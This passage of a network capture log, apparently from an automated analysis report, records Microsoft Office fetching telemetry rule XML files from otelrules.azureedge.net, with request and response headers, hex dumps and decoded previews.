                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              101192.168.2.44984813.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:07 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:07 UTC491INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:07 GMT
                                              Content-Type: text/xml
                                              Content-Length: 958
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                              ETag: "0x8DC582BA0A31B3B"
                                              x-ms-request-id: 28e57d84-e01e-003c-4a46-26c70b000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134607Z-17c5cb586f6f69jxsre6kx2wmc00000002yg000000007g44
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache-Info: L1_T2
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:07 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              102192.168.2.44984913.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:07 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:07 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:07 GMT
                                              Content-Type: text/xml
                                              Content-Length: 501
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                              ETag: "0x8DC582BACFDAACD"
                                              x-ms-request-id: f68a3f25-f01e-0052-02bd-259224000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134607Z-16849878b78k46f8kzwxznephs000000095g00000000chm8
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:07 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              103192.168.2.44985013.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:07 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:07 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:07 GMT
                                              Content-Type: text/xml
                                              Content-Length: 2592
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                              ETag: "0x8DC582BB5B890DB"
                                              x-ms-request-id: cd4a5759-201e-005d-4b3a-26afb3000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134607Z-r197bdfb6b4gqmwlpwzzs5v83s00000001n0000000007sku
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:07 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              104192.168.2.44985113.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:07 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:08 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:08 GMT
                                              Content-Type: text/xml
                                              Content-Length: 3342
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                              ETag: "0x8DC582B927E47E9"
                                              x-ms-request-id: cd066ebd-401e-0035-394c-2682d8000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134608Z-17c5cb586f6w4mfs5xcmnrny6n00000002500000000041y0
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:08 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              105192.168.2.44985213.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:07 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:08 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:08 GMT
                                              Content-Type: text/xml
                                              Content-Length: 2284
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                              ETag: "0x8DC582BCD58BEEE"
                                              x-ms-request-id: 273a8d1a-001e-0034-0d8c-21dd04000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134608Z-16849878b78nx5sne3fztmu6xc00000001eg00000000m62c
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:08 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              106192.168.2.44985313.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:08 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:08 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:08 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1393
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                              ETag: "0x8DC582BE3E55B6E"
                                              x-ms-request-id: 9bebe7cf-201e-0033-1046-26b167000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134608Z-r197bdfb6b48v72xb403uy6hns000000013g00000000a57e
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:08 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              107192.168.2.44985413.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:08 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:08 UTC584INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:08 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1356
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                              ETag: "0x8DC582BDC681E17"
                                              x-ms-request-id: 19a18c92-701e-0098-0fb0-26395f000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134608Z-16849878b787wpl5wqkt5731b4000000019g00000000gsuk
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache-Info: L1_T2
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:08 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              108192.168.2.44985513.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:08 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:08 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:08 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1393
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                              ETag: "0x8DC582BE39DFC9B"
                                              x-ms-request-id: 0243abe0-001e-0028-29fb-25c49f000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134608Z-16849878b78fmrkt2ukpvh9wh4000000098g000000009sqf
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:08 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              109192.168.2.44985613.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:08 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:09 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:08 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1356
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                              ETag: "0x8DC582BDF66E42D"
                                              x-ms-request-id: 55d9b643-201e-003f-330b-226d94000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134608Z-16849878b78s2lqfdex4tmpp7800000009bg00000000789v
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:09 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              110192.168.2.44985713.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:08 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:09 UTC584INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:09 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1395
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                              ETag: "0x8DC582BE017CAD3"
                                              x-ms-request-id: 90c23955-201e-0096-7520-26ace6000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134609Z-17c5cb586f6mkpfk79wxvcahc000000000z0000000009z4z
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache-Info: L1_T2
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:09 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              111192.168.2.44985813.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:09 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:09 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:09 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1358
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                              ETag: "0x8DC582BE6431446"
                                              x-ms-request-id: 20049dc1-d01e-0014-1b33-22ed58000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134609Z-16849878b786vsxz21496wc2qn00000009c000000000b6bv
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
